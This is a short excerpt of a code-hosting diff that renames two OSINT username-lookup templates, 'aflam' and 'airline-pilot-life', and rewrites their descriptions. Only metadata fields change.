severity: info
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N

4
osint/aflam.yaml
View File

@ -1,9 +1,9 @@
id: aflam
info:
name: aflam
name: Aflam User Name Information - Detect
author: dwisiswant0
description: This OSINT template looks for information about a user name.
description: Aflam user name information check was conducted.
severity: info
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N

4
osint/airline-pilot-life.yaml
View File

@ -1,9 +1,9 @@
id: airline-pilot-life
info:
name: Airline_Pilot_Life
name: Airline Pilot Life User Name Information - Detect
author: dwisiswant0
description: This OSINT template looks for information about a user name.
description: Airline Pilot Life user name information check was conducted.
severity: info
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N

Some files were not shown because too many files have changed in this diff Show More